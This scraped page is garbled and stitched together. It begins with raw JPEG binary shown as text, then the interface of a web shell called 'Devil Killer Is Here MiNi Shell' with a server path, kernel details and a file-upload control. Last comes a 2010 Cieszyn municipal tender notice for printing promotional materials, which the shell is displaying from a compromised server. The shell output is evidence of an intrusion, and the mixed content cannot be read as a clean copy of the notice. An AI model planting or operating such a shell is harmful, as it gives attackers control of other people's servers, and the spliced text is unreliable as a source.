JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100413/102692-N-2010.html

<p class="kh_header"><b>Cieszyn: Druk i wykonanie materiałów promocyjnych Cieszyna</b><br>
<b>Numer ogłoszenia: 102692 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cieszyn, w imieniu której działa Burmistrz Miasta Cieszyna , Rynek 1/11, 12, 43-400 Cieszyn, woj. śląskie, tel. 033 4794200, 4794350, faks 033 4794303, 4794361.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i wykonanie materiałów promocyjnych Cieszyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi Druk i wykonanie materiałów promocyjnych Cieszyna
Szczegółowy opis przedmiotu zamówienia:

I. Materiały związane z projektem CISO - Cieszyński Informatyczny System Oświatowy, który jest wspólfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego 2007 - 2013

1. Naklejki CISO 
Nakład: 300 szt
Format: 80x210 mm
Kolor: 4+0
Materiał: papier samoprzylepny błyszczący + lakier UV

Przekazanie projektu graficznego naklejek, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 23.06.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego. Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 czerwca 2010r., do godziny 13.00.
2. Plakat CISO
Nakład: 100 szt.
Format: B2
Kolor: 4+0 + jednostronnie lakier matowy UV 
Materiał: biała kreda matowa 170 g

Przekazanie projektu graficznego plakatu, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 23.06.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 czerwca 2010r., do godziny 13.00.

3. Broszura informacyjna CISO
Nakład: 200 szt.
Format: 210x210 mm
Okładka: biała kreda matowa 200 g + jednostronnie folia matowa + lakier UV wybiórczo
Środek: 16 stron, biała kreda matowa 150 g, kolor 4+4

Przekazanie projektu graficznego publikacji, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 6.09.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 września 2010 r., do godziny 13.00.

II Materiały Biura Promocji i Informacji

1. Plakaty (Cieszyńskie Smaki, Koncert Zespołu Reprezentacyjnego Wojska Polskiego, Limeryki cieszyńskie, Zespół Śląsk)
Nakład: 4 wzory, każdy po 300 szt., suma: 1200 szt.
Format: B2
Materiał: biała kreda matowa 170 g
Kolor: 4+0 + jednostronnie lakier matowy UV 

Przekazanie projektu graficznego plakatu Cieszyńskie Smaki, w formacie pdf,  nastąpi do dnia 17 maja 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 3 dni roboczych od dostarczenia projektu, do godziny 13.00.

Przekazanie projektu graficznego plakatu Limeryki cieszyńskie, w formacie pdf,  nastąpi do dnia 24 maja 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 3 dni roboczych od dostarczenia projektu, do godziny 13.00.

Przekazanie projektu graficznego plakatu Zespół Śląsk, w formacie pdf,  nastąpi do dnia 26 lipca 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 3 dni roboczych od dostarczenia projektu, do godziny 13.00.
Przekazanie projektu graficznego plakatu Koncert Zespołu Reprezentacyjnego Wojska Polskiego, w formacie pdf,  nastąpi do dnia 27 września 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 3 dni roboczych od dostarczenia projektu, do godziny 13.00.

2. Kartka świąteczna
Nakład: 3 wzory (300, 250 i 50 szt.) suma: 600 szt.
Format: 210x210 mm, po złożeniu 105x210 mm
Kolor: 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Materiał: biała kreda matowa 350 g
Wkładka do kartki świątecznej
Nakład: 250 szt.
Format: 100x210 mm
Kolor: 4+0
Materiał: biała kreda matowa  350 g

Przekazanie projektu graficznego kartki, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 29.10.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 listopada 2010 r., do godziny 13.00.

3. Kalendarz biurkowy
Nakład: 2000 szt.
Stelaż kalendarza
Materiał: biały karton 350 g jednostronnie gładki
Format stelaża po rozłożeniu: 180 + 80 +180 mm (3x bigowane) x 150 mm
Podstawa kalendarza: 80x150 mm, stelaż spięty białą spiralą na dł. 150 mm
Kartki kalendarza (7 kart łączonych białą spiralą ze stelażem)
Format: 150x175 mm
Materiał: biała kreda matowa 250 g
Kolor: 4+4 + dwustronnie lakier UV wybiórczo
Sposób złożenia stelaża i połączenia kart ze stelażem przedstawia zdjęcie obok

Przekazanie projektu graficznego kalendarza, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 29.10.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji.  W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającemu.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 listopada 2010 r., do godziny 13.00.

4. Kalendarzyki kieszonkowe
Nakład: 4 wzory po 5000 szt. (suma: 20 000 szt.)
Format: 90x60 mm (zaokrąglone narożniki)
Kolor: 4+4 + obustronnie lakier UV matowy 
Materiał: biała kreda matowa 350 g

Przekazanie projektu graficznego kalendarzyków, w formacie pdf,  na serwer FTP drukarni nastąpi do dnia 29.10.2010 r. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 30 listopada 2010 r., do godziny 13.00.
5. Kartka pocztowa
Nakład: 5000 szt.
Format: 100x210 mm
Kolor: 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Materiał: biała kreda matowa 350g

Przekazanie projektu graficznego kartki, w formacie pdf, nastąpi w dniu podpisania umowy na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 5 dni roboczych od podpisania umowy, do godziny 13.00.

6. Kartka Dukaty lokalne
Nakład: 1000 szt.
Format: 210x210 mm, po złożeniu 105x210 mm, wycięte 3 otwory o średnicy 35 mm
Kolor: 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Materiał: biała kreda matowa 350 g

Przekazanie projektu graficznego publikacji, w formacie pdf,  nastąpi w dniu podpisania umowy na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 5 dni roboczych od podpisania umowy, do godziny 13.00.

7. Zaproszenia Cieszyńskie smaki
Nakład: 400 szt.
Format: 210x210 mm, po złożeniu 105x210 mm
Kolor: 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Materiał: biała kreda matowa 350 g

Przekazanie projektu graficznego zaproszenia, w formacie pdf,  nastąpi do dnia 17 maja 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 5 dni roboczych od dostarczenia projektu graficznego, do godziny 13.00.

8. Broszura Cieszyńskie smaki
Nakład: 2000 szt.
Broszura zszywana
Format: 235x110 mm
Okładka: biała kreda matowa 200 g, kolor 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Środek: 20 stron, biała kreda matowa, kolor 4+4

Przekazanie projektu graficznego publikacji, w formacie pdf,  nastąpi do 30 czerwca 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 10 dni roboczych od dostarczenia projektu graficznego, do godziny 13.00.

9. Papier pakunkowy
Nakład: 200 arkuszy
Format: 700x1000 mm
Materiał: biała kreda matowa 115 g
Kolor: 2+0 (Pantone)

Przekazanie projektu graficznego papieru, w formacie pdf,  nastąpi w dniu podpisania umowy na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 5 dni od podpisania umowy, do godziny 13.00.

10. Zaproszenia - Zespół Reprezentacyjny
Nakład: 400 szt.
Format: 210x210 mm, po złożeniu 105x210 mm
Kolor: 4+4 + jednostronnie folia matowa + lakier UV wybiórczo
Materiał: biała kreda matowa 350 g

Przekazanie projektu graficznego zaproszenia, w formacie pdf,  nastąpi do 13 września 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 5 dni od dostarczenia projektu graficznego, do godziny 13.00.

11. Broszura Cieszyn w liczbach ISBN 978-83-89835-49-9
Nakład: 1000 szt.
Format 105 x 210 mm
Objętość: 32 stron + okładka
Okładka: kreda matowa 300 g
Kolor: 2+0
Środek: 
Papier offsetowy 80 g
Kolor: 1+1, ale strona 1: 2+1, + strona 11: 2+1 + strona 21: 2+1
Broszura szyta (2 zszywki)

Przekazanie projektu graficznego broszury , w formacie pdf,  nastąpi do 31 maja 2010 r. na serwer FTP drukarni. Wykonawca przedstawi Zamawiającemu próbny wydruk do akceptacji. W razie wystąpienia błędów Wykonawca zobowiązuje się do wprowadzania ewentualnych drobnych poprawek, zgodnie ze wskazówkami Zamawiającego, aż do uzyskania ostatecznej wersji do druku, która zostanie zatwierdzona przez Zamawiającego.
Termin wykonania i dostarczenia do siedziby Zamawiającego całości nakładu: do 10 dni od dostarczenia projektu graficznego, do godziny 13.00..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W ramach zamówień uzupełniających przewiduje się wykonanie usług tożsamych z przedmiotem zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.81.00.00-5, 79.82.00.00-8, 79.82.10.00-5, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1 Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 900,00 PLN.
2 Forma wadium
Wadium może być wniesione w następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowokredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 Nr 42, poz. 275, z późn. zm.).
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
odmówił podpisania umowy na warunkach określonych w ofercie, lub
nie wniósł zabezpieczenia należytego wykonania umowy, lub
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców wadium może zostać wniesione przez Lidera konsorcjum występującego w imieniu wszystkich jego uczestników, pod warunkiem, że został on do tego upoważniony.

3 Miejsce i sposób wniesienia wadium
1)Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: ING Bank Śląski S.A. o_Cieszyn, nr konta: 44 1050 1083 1000 0022 6985 8169 z dopiskiem: Wadium Druk i wykonanie materiałów promocyjnych Cieszyna Do oferty należy dołączyć kopię polecenia przelewu poświadczoną za zgodność z oryginałem przez Wykonawcę składającego ofertę.
2)Wadium w innych dopuszczonych formach (oryginały dokumentów) należy wnieść (zdeponować) w Kasie Urzędu Miejskiego w Cieszynie, Rynek 1, pok. Nr 26, od poniedziałku do piątku, w godz. 8:00 - 14:00, a do oferty należy dołączyć poświadczoną przez Wykonawcę za zgodność z oryginałem kopię.
3)Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w oznaczonym terminie  w dniu otwarcia ofert znajduje się na rachunku Zamawiającego.
4)Wadium w formie nie pieniężnej Zamawiający uzna za skutecznie wniesione - jeżeli przedmiotowy dokument znajdzie się w kasie Zamawiającego w terminie wyznaczonym do składania ofert.
4 Termin wniesienia wadium
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
5 Zwrot wadium
Zamawiający, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp, zwraca wadium:
a)wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza
b)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy
c)na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
6 Utrata wadium
1.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
2.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7 Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zostało ono zwrócone, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę polegającą na wydrukowaniu i wykonaniu materiałów promocyjnych o wartości co najmniej 30 000 zł brutto

Ocena spełnienia powyższego warunku dokonana zostanie na podstawie złożonych oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
